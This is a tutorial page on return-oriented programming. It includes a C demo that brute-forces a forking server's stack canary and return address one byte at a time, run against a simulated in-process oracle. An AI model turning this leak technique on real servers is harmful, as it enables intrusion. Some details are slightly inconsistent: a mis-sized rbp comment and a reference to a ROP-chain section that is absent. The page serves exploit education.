Return Oriented Programming

ROP is an exploit technique that lets an attacker run code of their choosing even when defenses such as executable space protection (NX) and code signing stop them from injecting new code. Instead of injecting code, the attacker chains together short instruction sequences that already exist in executable memory (gadgets, usually ending in ret) by controlling the stack.

Use Case

One of the primary reasons to attack a binary with a ROP exploit is that it has NX set. NX (no-execute) is a hardware-enforced memory protection: the CPU refuses to execute instructions from pages the operating system marks non-executable, and the stack is one of those pages, so shellcode placed there faults instead of running. The workaround is to reuse code that is already executable: short instruction sequences in the binary (or its libraries) that end in ret, called gadgets. Each gadget is entered by putting its address on the stack where a return address is expected, and the sequence of gadget addresses we overwrite the stack with is the ROP chain. The checksec output below shows the classic target: NX is enabled, so stack shellcode is out, but there is no stack canary, so a plain overflow can overwrite the return address.

$ checksec -f binary
RELRO           STACK CANARY      NX        
Partial RELRO   No canary found   NX enabled

Tools

Ropper

ROPGadget

Finding Gadgets

Forking Socket Servers

Because a forking server handles each connection in a child created by fork(), every child inherits the parent's stack canary, saved base pointer, and return address, and a child that crashes does not change them for the next one. That makes all three recoverable one byte at a time: overwrite one more byte than is known, and if the connection is still answered the guess was right, so each byte costs at most 256 connections instead of 2^64 for the whole value.
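The byte-at-a-time loop described above, as an added example that is not part of the original page. The server is replaced by a hypothetical in-process oracle that behaves like a forked child: it dies if any overwritten byte past the 64-byte buffer differs from what the parent had, and answers normally otherwise. The frame contents (canary, saved rbp, return address) are constructed values so the demo can check its own answer; on a real target they are the unknowns.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE  64   /* the overflowable stack buffer in the child */
#define FRAME_LEN 24   /* canary (8) + saved rbp (8) + return address (8) */

/* Constructed stand-in for what sits above the buffer in every forked child.
 * Unknown on a real target; fixed here so the demo can verify itself. The canary's
 * low byte is 0x00, as glibc sets it, so that byte falls on the very first guess. */
static const uint8_t secret_frame[FRAME_LEN] = {
    0x00, 0x11, 0xde, 0xad, 0xbe, 0xef, 0x42, 0x99,  /* canary */
    0x00, 0xcd, 0xab, 0x34, 0x12, 0xfd, 0x7f, 0x00,  /* saved rbp  (0x00007ffd1234abcd00) */
    0x36, 0x11, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,  /* return address (0x401136) */
};

static unsigned long connections;

/* Hypothetical oracle standing in for one connection to the forking server.
 * The child copies `len` bytes into its 64-byte buffer and returns. It dies if
 * __stack_chk_fail sees a modified canary or a corrupted rbp/return address makes
 * it fault, and answers normally otherwise. Because every child is fork()ed from
 * the same parent, these bytes are identical on every attempt. */
static bool child_answers(const uint8_t *payload, size_t len)
{
    connections++;
    if (len <= BUF_SIZE) return true;                 /* no overflow at all */
    size_t n = len - BUF_SIZE;
    if (n > FRAME_LEN) n = FRAME_LEN;
    return memcmp(payload + BUF_SIZE, secret_frame, n) == 0;
}

unsigned long connections_used(void) { return connections; }

/* Recover `nbytes` bytes past the buffer one at a time: keep every byte already
 * known, try 0..255 for the next one, and accept the first guess the child survives.
 * Returns how many bytes were recovered (nbytes on success). */
size_t leak_frame(size_t nbytes, uint8_t *out)
{
    uint8_t payload[BUF_SIZE + FRAME_LEN];
    if (nbytes > FRAME_LEN) nbytes = FRAME_LEN;
    memset(payload, 'A', BUF_SIZE);                   /* fill the buffer itself */
    for (size_t i = 0; i < nbytes; i++) {
        bool found = false;
        for (int guess = 0; guess < 256; guess++) {
            payload[BUF_SIZE + i] = (uint8_t)guess;   /* one byte past what we know */
            if (child_answers(payload, BUF_SIZE + i + 1)) {
                out[i] = (uint8_t)guess;
                found = true;
                break;
            }
        }
        if (!found) return i;                         /* oracle is not behaving as assumed */
    }
    return nbytes;
}

/* Read 8 little-endian bytes back into an integer for display. */
static uint64_t u64le(const uint8_t *p)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}

int main(void)
{
    uint8_t frame[FRAME_LEN];
    size_t got = leak_frame(FRAME_LEN, frame);
    printf("recovered %zu bytes in %lu connections\n", got, connections_used());
    printf("canary = 0x%016llx\n", (unsigned long long)u64le(frame));
    printf("rbp    = 0x%016llx\n", (unsigned long long)u64le(frame + 8));
    printf("ret    = 0x%016llx\n", (unsigned long long)u64le(frame + 16));
    return 0;
}
```

One caveat the oracle hides: a wrong canary byte always kills the child, but a wrong return-address byte only does so if the resulting address faults, so against a real server the "survived" signal for those bytes should be a distinguishable response rather than just an open connection. Once the frame is recovered, the saved rbp gives a stack address and the return address gives the binary's load base, which is what the chain in the previous section needs under PIE.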

Examples

  1. "Old Bridge" binex challenge on HackTheBox

  2. "Rope" root exploit on HackTheBox

Practice

Hands-down, the best way to practice ROP is by going through the challenges on ROP Emporium. Solutions are posted online if you get stuck.
